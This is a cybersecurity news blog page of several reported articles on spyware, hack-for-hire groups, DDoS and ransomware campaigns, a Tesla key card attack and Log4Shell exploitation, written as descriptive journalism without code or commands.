Search This Blog

Showing posts with label Attack. Show all posts

Experts Discover New CloudMensis Spyware Targeting Apple macOS Users

 

Researchers in cybersecurity have revealed previously unknown malware targeting Apple's macOS operating system. The malware, nicknamed CloudMensis by the Slovak cybersecurity firm ESET, is reported to exploit popular cloud storage systems like pCloud, Yandex Disk, and Dropbox only for receiving attacker orders and exfiltrating files. 

"Its capabilities clearly show that the intent of its operators is to gather information from the victims' Macs by exfiltrating documents, keystrokes, and screen captures," ESET researcher Marc-Etienne M.Léveillé stated in a report published. 

CloudMensis was found in April 2022, written in Objective-C, and is intended to attack both Intel and Apple semiconductor architectures. The initial infection vector for the attacks, as well as the targets, are yet unclear. However, the malware's limited dissemination suggests that it is being utilised as a part of a carefully targeted operation targeting businesses of interest. 

ESET discovered an attack chain that exploits code execution and administrative rights to launch a first-stage payload that is used to retrieve and run a second-stage malware housed on pCloud, which exfiltrates documents, screenshots, and email attachments, among other things. 

The first-stage downloader is also known to delete evidence of Safari sandbox escape and privilege escalation attacks in 2017 that make use of four now-resolved security flaws, implying that CloudMensis may have gone undetected for many years. The implant also includes capabilities that allow it to circumvent the Transparency, Consent, and Control (TCC) security system, which requires all programmes to seek user permission before accessing files in Documents, Downloads, Desktop, iCloud Drive, and network volumes. 

It accomplishes this by exploiting another fixed security flaw known as CVE-2020-9934, which was discovered in 2020. The backdoor also allows you to access a list of running processes, capture screenshots, list files from removable storage devices, and launch shell commands and other arbitrary payloads. 

Furthermore, an examination of information from the cloud storage infrastructure reveals that the pCloud accounts were established on January 19, 2022, with compromises beginning on February 4 and spiking in March. 

M.Léveillé said, "The general quality of the code and lack of obfuscation shows the authors may not be very familiar with Mac development and are not so advanced. Nonetheless, a lot of resources were put into making CloudMensis a powerful spying tool and a menace to potential targets."

Google Blocked Dozens of Domains Used by Hack-for-hire Groups

 

Google's Threat Analysis Group released a blog post on Thursday detailing the actions of hack-for-hire groups in Russia, India, and the United Arab Emirates. More than 30 domains used by these threat groups have been added to the internet giant's Safe Browsing system, preventing users from accessing them. 

Hack-for-hire groups are sometimes confused with businesses that provide surveillance tools. As per Google, surveillance vendors often give the tools required for spying but leave it up to the end-user to run them, whereas hack-for-hire groups perform the attacks themselves. Several hack-for-hire groups have been found in recent years. Google's investigation focuses on three groups thought to be based in India, Russia, and the United Arab Emirates. 

Google has been tracking the threat actor linked to India since 2012, with some of its members formerly working for offensive security firms. They now appear to be employed by Rebsec, a new firm that publicly sells corporate espionage services. The group has been observed phishing credentials for AWS, Gmail, and government services accounts from healthcare, government, and telecom firms in the Middle East. 

The Russia-linked threat actor, known as Void Balaur by others, has targeted journalists, politicians, NGOs and organisations, and persons who looked to be ordinary residents in Russia and neighbouring nations. Phishing was also used in these assaults. 

“After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP. Both OAuth tokens and App Passwords are revoked when a user changes their password,” explained Shane Huntley, director of Google’s Threat Analysis Group. 

This group also had a public website where it advertised social media and email account hacking services. The UAE group primarily targets government, political, and educational groups in North Africa and the Middle East. This threat actor also employs phishing emails, but unlike many other organisations, it employs a custom phishing kit rather than open source phishing frameworks. 

“After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. The attacker would then use a custom tool to download the mailbox contents via IMAP,” Huntley said. 

Google believes Mohammed Benabdellah, who was sued by Microsoft in 2014 for developing the H-Worm (njRAT) malware, is associated with the group.

Cyberattack Struck Norway, Pro-Russian Hacker Group Fingered

 

According to Norwegian authorities, a cyberattack momentarily took offline public and private websites in Norway in the last 24 hours.

As per Norwegian Prime Minister Jonas Gahr Stre, the attack has not caused any serious harm. According to the Norwegian National Security Authority, the distributed-denial-of-service (DDOS) attack targeted a secure national data network, causing the temporary suspension of internet services for many hours. 

According to NSM chief Sofie Nystrm, the attacks appear to be the work of a criminal pro-Russian gang. She went on to say that the attacks "create the sense that we are a piece in Europe's present political crisis." 

So according to Norwegian media, the country's ambassador to Moscow was called to the Foreign Ministry on Wednesday for a protest about Russian supplies being denied transit via Norway to an Arctic Russian coal-mining settlement. 

The hamlet of Barentsburg is located in the Svalbard archipelago, some 800 kilometres (500 miles) north of the Norwegian mainland. Because of the war in Ukraine, the European Union has imposed restrictions on a number of Russian commodities. 

Norway is not a member of the EU, although it follows its policies on most issues. Norway has sovereignty over the Svalbard archipelago by a 1920 treaty, but other signatory countries have the right to use its natural resources. 

The cyberattack on Norway occurred two days after a similar attack briefly shut down official and private websites in Lithuania, with a pro-Moscow hacking group claiming responsibility. That event occurred just a week after Russian authorities warned of retaliation because Lithuania blocked the transit of steel and ferrous metals sanctioned by the EU via its territory to Russia’s exclave of Kaliningrad.

Chinese Hackers Disseminating SMS Bomber Tool with Hidden Malware

 

A threat cluster linked to the Tropic Trooper hacking group has been identified employing previously undocumented malware developed in Nim language to attack targets as part of a newly revealed operation. 

The new loader, codenamed Nimbda, is "bundled with a Chinese language greyware 'SMS Bomber' malware that is most likely illegally circulated through the Chinese-speaking web," according to a report by Israeli cybersecurity firm Check Point. "Whoever crafted the Nim loader took special care to give it the same executable icon as the SMS Bomber that it drops and executes," the researchers said. 

"Therefore the entire bundle works as a trojanized binary." SMS Bomber, as the name implies, allows the user to enter a phone number (not their own) in order to flood the victim's device with messages, perhaps rendering it useless in a denial-of-service (DoS) attack. 

The fact that the binary functions as both an SMS Bomber and a backdoor show that the assaults are not just directed at individuals who use the tool — a "somewhat unorthodox target" — but are also highly targeted. 

Tropic Trooper, also known as Earth Centaur, KeyBoy, and Pirate Panda, has a history of attacking targets in Taiwan, Hong Kong, and the Philippines, especially in the government, healthcare, transportation, and high-tech industries. 

Trend Micro last year referred to the Chinese-speaking collective as particularly clever and well-equipped, highlighting the group's capacity to develop its TTPs to stay under the radar and rely on a wide range of proprietary tools to compromise its targets. 

Check Point's most recent attack chain begins with the tainted SMS Bomber tool, the Nimbda loader, which runs an embedded executable, in this case, the legal SMS bomber payload, while simultaneously injecting a second piece of shellcode into a notepad.exe process. This initiates a three-tier infection process, which includes downloading a next-stage malware from an obfuscated IP address given in a markdown file ("EULA.md") published in an attacker-controlled GitHub or Gitee repository. The retrieved binary is an improved version of the 

Yahoyah trojan, is designed to gather data about local wireless networks in the victim machine's proximity and other system metadata and send it to a command-and-control (C2) server. Yahoyah, for its role, serves as a conduit for the final-stage malware, which is downloaded from the C2 server in the form of an image. The steganographically encoded payload is a backdoor known as TClient, which the group has used in past attacks. 

The researchers concluded, "The observed activity cluster paints a picture of a focused, determined actor with a clear goal in mind."

"Usually, when third-party benign (or benign-appearing) tools are hand-picked to be inserted into an infection chain, they are chosen to be the least conspicuous possible; the choice of an 'SMS Bomber' tool for this purpose is unsettling, and tells a whole story the moment one dares to extrapolate a motive and an intended victim."

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers detected a functionality in Office 365 that enables cybercriminals to ransom items stored on SharePoint and OneDrive. When the researchers informed Microsoft, they were assured that the system was functioning as designed and it is a feature rather than a vulnerability. 

Files stored and updated on the cloud have long been thought to be resistant to encryption extortion — the autosave and versioning capabilities should offer enough backup capability. Researchers at Proofpoint have displayed that this is a false assumption. They reported, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.” 

There are two ways to accomplish this using the Microsoft versioning feature (which allows the user to specify the maximum number of older versions to be stored). Older versions beyond this level are designed difficult, if not impossible to recover. The first attack is more theoretical than practical, while the second is undeniably practical. The maximum number of revisions of a document that may be saved by default is 500. Simply said, the attacker modifies and encrypts the file 501 times. 

The changes do not have to be significant - just enough to cause the system to save the new (encrypted) version. All versions of the document will be encrypted by the completion of the procedure, and the file will be unrecoverable without the decryption key. This is a theoretical attack. In actuality, it would be loud and easily discovered. The second method is more practical: utilise the built-in user-controlled versioning tool to reduce the number of stored versions to one. 

Every SharePoint and OneDrive document library includes a user-configurable parameter for the number of stored versions, which can be found under list settings for each document library. Setting the version limit to zero does not help an attacker since it does not erase older versions that the user can still recover. 

If the limit is set to one, the file only has to be encrypted twice before the user loses access to its contents. If information is exfiltrated before encryption, the attacker has the option of launching a second extortion attempt. The attack chain includes initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration, and encryption, and extortion. 

If the file owner keeps a local copy of the file, the impact of this attack will be limited. In this case, the attacker must compromise both the endpoint and the cloud account to ensure success. Proofpoint followed the Microsoft disclosure route and submitted the vulnerability to Microsoft before publicly revealing it. 

Microsoft stated that, first, the versioning settings function properly, and that, second, previous versions of files can potentially be retrieved and restored for an additional 14 days with the aid of Microsoft Support. 

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

Therefore, the conclusion of the story is straightforward do not think files saved and updated in the cloud are immune to extortion attempts. Ransomware mitigation procedures must still be in place.

Researcher Demonstrated How Tesla Key Card Feature Can be Exploited to Steal Cars

 

A researcher demonstrated how a Tesla key card functionality launched last year might be misused to add an unauthorised key that enables an attacker to access and start a vehicle. 

Martin Herfurt, an Austria-based member of the Trifinite research group that specialises in Bluetooth security, conducted the study. Herfurt's research focused on key card access modifications made by Tesla in August 2021, which removed the necessity for customers to place the key card on the central console after using it to open the vehicle. 

The researcher discovered that when a Tesla is opened through NFC using the key card, there is a 130-second window during which an attacker within the Bluetooth range of the targeted vehicle may add their own key. The attack exploits Tesla's VCSEC protocol, which manages communication between the automobile, the phone app, and the key fob. 

Findings by the researcher: 

During such an assault, the infotainment system makes no attempt to warn the victim that a new key has been inserted. According to the researcher, he tried the attack on the Tesla Model 3 and Model Y, but he believes it should also work on the newer Model S and Model X. At the recent Pwn2Own 2022 hacking competition, hackers won $75,000 for an attack targeting Tesla's infotainment system. Herfurt intended to show off his attack at Pwn2Own, but relay attacks were not permitted. 

In reality, he claimed to have identified the authorisation timer attack vector in September 2021 but had been keeping it for Pwn2Own. The researcher stated that he did not inform Tesla about his recent findings before revealing them since he considered the company needed to be aware of the problem. 
Following his disclosure, he received confirmation from others who reported a very issue to Tesla months ago that Tesla was aware of the vulnerability. 

According to the researcher, Tesla recommends using the PIN2Drive function, which requires customers to input a PIN before driving away, but he produced a video last week demonstrating how an attacker may overcome PIN2Drive. Tesla is yet to react to a comment request.

Herfurt is working on TeslaKee, a new smartphone application that is said to safeguard Tesla vehicles from these sorts of relay attacks. Herfurt demonstrated another approach to stealing a Tesla in May. The attacker utilised two Raspberry Pi devices to relay the radio signal between the Phone Key and an automobile over a considerable distance.

Iranian Hackers Behind Cox Media Group Ransomware Attack

 

Iranian hackers were behind the ransomware attack that disrupted Cox radio and TV stations' IT systems and live streaming earlier this year, according to The Record. 

The attack was carried out by a threat actor known as DEV-0270, which has been linked to many incursions against US organizations this year that resulted in the deployment of ransomware. While the Cox Media Group's infiltration was discovered on June 3 when the attackers used ransomware to encrypt some internal servers, the group had been breaching and hiding inside the company's internal network since mid-May. 

The attack did not affect all Cox Media Group radio and television stations, but it did disrupt certain stations' capability to broadcast live feeds on their websites. Initially, the Cox Media Group attempted to downplay the incident. 

Local reporters who used Twitter to convey information about the ransomware attack were admonished and forced to withdraw their posts. However, four months later, in October, the corporation finally confirmed the incident, although without disclosing any details about the Iranian hackers. 

The disclosure that Iranian hackers were behind the Cox attack comes less than a month after the US Department of Justice charged two Iranian citizens with various hacking-related offenses in November. One of them was for compromising a US media firm with the goal of disseminating false information about the legality of the US 2020 Presidential election via its website. 

Lee Enterprises, which owns the Buffalo News, the Arizona Daily Star, and the Omaha World-Herald, was eventually confirmed as the company. DEV-0270 has previously engaged in both information-collection operations and financially motivated attacks, according to a Microsoft threat intelligence analysis on the group, obscuring the true reason behind the recent Cox ransomware attack. 

The strategy of delivering ransomware on the networks of large corporations was first detected in late 2016 by Iranian hackers, namely the SamSam group. Their strategy of focusing on large businesses rather than end-users was later adopted by the majority of ransomware threat actors, and is now known as "big-game hunting." 

Since then, the majority of ransomware attacks have been attributed to Russian-based groups; however, certain ransomware cases have also been linked to members of state-sponsored espionage groups operating in Iran, China, and North Korea in recent years. 

These groups used ransomware on the networks of some of their victims as a path to monetize compromised companies with no intelligence-collection value or to hide intelligence collection behind a more generic ransomware issue that wouldn't prompt a more in-depth examination. 

Cox Media Group spokespersons did not respond to inquiries for comment on the incursion in May and June.

Conti Ransomware Exploits Log4j Flaw to Hack VMware vCenter Servers

 

The critical Log4Shell exploit is being used by the Conti ransomware operation to obtain quick access to internal VMware vCenter Server instances and encrypt virtual machines. The group wasted no time in adopting the new attack vector, becoming the first "top-tier" operation to exploit the Log4j flaw. 

On December 9, a proof-of-concept (PoC) exploit for CVE-2021-44228, also known as Log4Shell, was made public. A day later, numerous actors began scanning the internet in search of vulnerable systems. Cryptocurrency miners, botnets, and a new ransomware strain called Khonsari were among the first to leverage the flaw. 

By December 15, state-backed hackers and initial access brokers, who sell network access to ransomware gangs, had joined the list of threat actors using Log4Shell. Conti, one of today's largest and most prolific ransomware groups with tens of full-time members, seems to have developed an early interest in Log4Shell, viewing it as a potential attack channel on Sunday, December 12. 

The group began seeking fresh victims the next day, with the intention of lateral migration to VMware vCenter networks, as per Advanced Intelligence (AdvIntel), a cybercrime and hostile disruption firm. Log4Shell has impacted dozens of vendors, who have rushed to patch their products or provide workarounds and mitigations for customers. VMware is one among them, with 40 products listed as vulnerable. 

While the firm has suggested mitigations or fixes, a patch for the affected vCenter versions has yet to be released. Although vCenter servers are not generally accessible to the internet, there are a few scenarios in which an attacker may exploit the flaw.

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – Vmware 

Log4Shell to move laterally 

"This is the first time this vulnerability entered the radar of a major ransomware group," according to a report shared with BleepingComputer. 

“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” - AdvIntel 

While most defenders are aimed at stopping Log4Shell attacks on Internet-connected devices, the Conti ransomware operation demonstrates how the vulnerability can be leveraged to attack internal systems that aren't as well-protected. 

Conti ransomware affiliates had already invaded the target networks and exploited vulnerable Log4j machines to obtain access to vCenter servers, according to the researchers. This indicates that Conti ransomware members used a different initial access vector to infect a network (RDP, VPN, email phishing) and are now utilising Log4Shell to move laterally on the network. 

Conti, the successor to the notorious Ryuk ransomware, is a Russian-speaking group that has been in the ransomware business for a long time. Hundreds of attacks have been carried out by the group, with its data leak site alone reporting over 600 victim firms who did not pay a ransom. Other firms who paid the actor to have their data decrypted are also included. The group has extorted more than $150 million from its victims in the last six months, according to AdvIntel.